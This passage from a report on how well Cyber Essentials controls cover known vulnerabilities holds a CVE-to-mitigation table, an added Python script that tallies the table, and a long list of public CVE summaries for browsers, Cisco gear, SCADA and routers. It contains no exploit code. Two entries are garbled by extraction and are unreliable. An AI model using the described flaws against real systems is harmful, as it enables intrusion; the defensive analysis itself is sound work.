CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall Anti-DOS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
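The table above is only useful in aggregate: which controls do the mitigating work, how many of the listed CVEs end up fully rather than partially covered, and how many apply to each SME network before any control is in place. The following script is an added example, not part of the report, that parses rows laid out as in the table (CVE, SME1 to SME4, Idealised, No CE, With CE) and produces those tallies. The sample rows are copied from the table; the parsing rules (status before the first " - ", controls separated by "," or "&", bracketed notes such as "[Time Delay]" ignored) are my assumptions about the cell conventions.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Sample rows copied from the Cyber Controls Applicability table above
# (constructed subset for the example; same column order as the table).
SAMPLE_ROWS = """\
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
"""

NETWORKS = ("SME1", "SME2", "SME3", "SME4", "Idealised")


@dataclass
class Row:
    cve: str
    affected: dict        # network name -> True if the CVE applies to that network
    no_ce: str            # status with no Cyber Essentials controls
    with_ce_status: str   # "Mitigated" / "Partially Mitigated" once controls are applied
    controls: list        # controls credited in the With CE cell


def parse_with_ce(cell):
    """Split 'Mitigated - A & B, C (D) [Note]' into (status, [controls]).

    Assumed cell convention: status text before the first ' - ', then a list of
    controls separated by ',' or '&'; a trailing bracketed note is not a control.
    """
    status, sep, rest = cell.partition(" - ")
    if not sep:
        return cell.strip(), []
    rest = re.sub(r"\s*\[[^\]]*\]", "", rest)       # drop notes like [Time Delay]
    controls = [c.strip() for c in re.split(r"[,&]", rest) if c.strip()]
    return status.strip(), controls


def parse_table(text):
    """Parse pipe-delimited rows in the table's column order into Row objects."""
    rows = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 8:
            raise ValueError(f"expected 8 columns, got {len(cells)}: {line!r}")
        cve, flags, no_ce, with_ce = cells[0], cells[1:6], cells[6], cells[7]
        status, controls = parse_with_ce(with_ce)
        affected = {net: flag == "y" for net, flag in zip(NETWORKS, flags)}
        rows.append(Row(cve, affected, no_ce, status, controls))
    return rows


def control_frequency(rows):
    """How many of the listed CVEs each control is credited with helping to mitigate."""
    return Counter(control for row in rows for control in row.controls)


def status_split(rows):
    """Count of CVEs per With-CE status (Mitigated vs Partially Mitigated)."""
    return Counter(row.with_ce_status for row in rows)


def applicable_per_network(rows):
    """Number of listed CVEs that apply to each network before controls are applied."""
    return Counter(net for row in rows for net, hit in row.affected.items() if hit)


if __name__ == "__main__":
    parsed = parse_table(SAMPLE_ROWS)
    print("controls:", control_frequency(parsed).most_common())
    print("status:", dict(status_split(parsed)))
    print("applicable:", dict(applicable_per_network(parsed)))
```

Run over the full table rather than the sample, the control frequencies show why the report singles out patch management: it appears in the With CE cell of almost every row, and the rows where it appears alone are mostly the "Partially Mitigated" ones.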
CVE Details

CVE-2013-0008
win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022
Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084
Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140
SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149
The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172
Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174
The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199
The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253
The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270
OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant_name when requesting a token.

CVE-2013-0481
The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598
Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619
Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633
Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649
Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753
Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787
Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909
The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035
The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102
The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1 and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140
The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144
Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153
Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181
Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303
Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384
Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388
Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450
Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620
The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627
Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638
Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676
The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700
The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734
Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777
The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319
FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340
Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492
Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507
Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736
Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780
Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803
ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824
Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826
WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920
The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064
Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116
Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137
Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280
EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387
Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417
The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632
The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656
Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856
Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860
Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893
Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897
Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900
The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905
Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223
The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436
The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478
Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529
Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555
Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776
NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.

CVE-2013-4782
The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057
hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369
IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428
IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431
Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494
Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507
The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536
Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559
Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561
The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751
Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757
Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167
Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188
Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284
Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396
The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475
Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660
The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699
The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702
The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979
The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994
OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster, Page 22 of 28
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
